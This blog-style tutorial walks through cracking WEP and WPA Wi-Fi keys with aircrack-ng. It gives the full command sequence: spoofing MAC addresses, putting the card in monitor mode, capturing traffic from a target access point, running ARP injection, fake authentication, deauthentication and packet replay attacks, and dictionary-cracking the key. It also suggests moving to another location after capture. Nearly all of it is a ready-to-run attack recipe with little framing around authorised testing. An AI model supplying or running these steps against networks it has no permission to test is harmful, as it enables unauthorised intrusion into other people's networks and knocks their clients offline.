Wireless card features
* Chipset: Intel WM3945AG
* IEEE Standards: 802.11a, 802.11b, 802.11g
* PCI ID: 8086:4227
Prerequisites
* gcc
* libopenssl-devel
* sqlite3-devel >=3.6.10
* iw
* http://trac.aircrack-ng.org/attachment/ticket/572/sha-compile-fix-64bit.patch
Installation
$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc2.tar.gz
$ tar -zxvf aircrack-ng-1.0-rc2.tar.gz
$ cd aircrack-ng-1.0-rc2
Patch source file sha1-sse2.S using instructions in sha-compile-fix-64bit.patch
$ make SQLITE=true
$ sudo make SQLITE=true install
Using airmon-ng
Stop previously started monitoring:
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng stop mon0
Change MAC of your wlan interface
$ sudo ifconfig wlan0 down
$ sudo macchanger -A wlan0
$ sudo ifconfig wlan0 up
$ ifconfig
Create additional wireless interface mon0 in monitor mode
$ sudo airmon-ng start wlan0
$ iwconfig
Change MAC of newly created interface
$ sudo ifconfig mon0 down
$ sudo macchanger -A mon0
$ sudo ifconfig mon0 up
$ ifconfig
From now on you'll be using mon0 interface.
Using airodump-ng
Find wireless network which is protected with:
$ sudo airodump-ng mon0
and write down target ssid (ESSID), MAC adress of access point (BSSID), channel number (CH), encryption type (ENC). When finished CTRL+C to exit.
Create directory for dumping information with:
$ cd ~/Documents
$ mkdir data
$ cd data
Run airodump-ng to capture packets from your access point to dumpfile*.cap. You should always specify a channel with airodump, because otherwise it will try to scan through all channels, and that will break your injection attack.
$ sudo airodump-ng --channel [Access Point channel] --bssid [Access Point bssid] -w [dumpfile] [device]
After a few seconds in airodump-ng, you should notice that there are clients connected to the access point. Connected clients will be listed under "STATION" at the lower half of the screen.
Take note of the MAC address of one of the clients - you will use it in the next step. This could be your faked MAC if there is no clients connected.
Using aireplay attack 3 - ARP Injection
Open another terminal window to run an ARP replay attack. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 then you should be getting #/s of 200 or higher, but more importantly, it should be much higher than what it was before.
$ aireplay-ng -3 -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]
-3 - is the number attack we're using. This attack keeps record of ARP packets which are used later on for decifering. There are 6 attacks numbered from 0 - 5.
Using aireplay attack 1 - Fake Authentication Attack
Usually attacks, 1 and 0, work together. There are situations when attack 1 will not work (i.e. MAC filtering is on), but it will work most of the time, and it's real quick. Currently, if you're following along, you should have two terminal windows open and running airodump and aireplay attack 3. If not, go back and follow the directions again.
To initiate attack 1 type:
$ aireplay-ng -1 0 -e [essid] -a [Access Point bssid] -h [yours faked client MAC addr] [device]
-1 - This is the number attack we're using. It is a fake authentication attack, making us authenticated with the AP so that we can deauthenticate, as you'll soon see.
0 - This is the delay between tries, if it doesn't happen on the first try, for a variety of reasons.
You must have fairly good power showing in airodump for this to work. It needs to be over 40 showing in the power column. Your experience may differ greatly. If all goes well, when you press Enter you should see something like:
10:13:24 Sending authentication request (Open System)
10:13:24 Authentication successful
10:13:24 Sending Association Request
10:13:24 Association successful :-)
What just happened is that you became associated with the AP, meaning that if you lose association, the AP will send out a call to get you back. This is what will usually start the ARP request. If you take a look at you console running attack 3, it possibly started getting lots of data in #Data and #/s columns. More often than not, you'll have to wait for the next step.
There can be many reasons that you won't be able to associate with the AP, meaning this attack failed. First of all, the AP may have MAC filtering on, which may be able to be circumvented. Or you may not be close enough to the AP to associate. It can also be that the encryption is WPA, not WEP, so you cannot use this method to inject.
Using aireplay attack 0 - Deauthentication Attack
If your #Data count is flying up, then you can skip this step. If not, or you are trying to crack WPA then read on.
If you followed up until now, you should a few windows open. One is running airodump, another is running aireplay attack 3. The last one ran aireplay attack 1 and you're back at the prompt now.
At the prompt type:
$ aireplay-ng -0 10 -e [essid] -a [Access Point bssid] [device]
-0 - is the attack number we're using. It is a deauthentication attack, meaning it tells the AP that we've disassociated and it tries to reconnect, sending out an ARP, which is what attack 3 is waiting for.
10 - is the amount of times it should send out the deauthentication. It may not reach the AP on the first try or what, so we like to do it a couple of times, hence the number 10.
This attack is best to use for WPA ecryption while waiting for HANDSHAKE to appear in upper right part of dumping screen.
If all went well then attack 3 should have picked up an ARP request, and it should be injecting very, very quickly. Go to the window with airodump, and watch with delight as the #Data count flies up.
Using aireplay attack 2 - Interactive Packet Replay
If your #Data count is not flying up, try this attack in which we are looking for large packet to use:
$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]
When ask to use this packet say yes:
Use this packet: y
Final step - aircrack
For WEP encryption wait a few minutes until the #Data reaches 50 000. This should be enough, but we leave the attack running just in case. Just remember that if you are cracking WEP encryption you are waiting for more data and if you are cracking WPA encryption you are waiting for HANDSHAKE to appear in upper right part of dumping screen when some client is connecting on access point. So for WEP you should use aireplay attacks 3, 1 and 0 in that order and for WPA you should use aireplay attacks 3 and 0.
After collected enough data or got a handshake you can disconnect and go to another location with data. Open another terminal window and run aircrack-ng to initiate key searching:
$ sudo aircrack-ng -r masterdb wpa*.cap -w '/path/to/password.lst'
After some time you will have the key.
Resources
http://www.aircrack-ng.org/doku.php?id=tutorial
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
No comments:
Post a Comment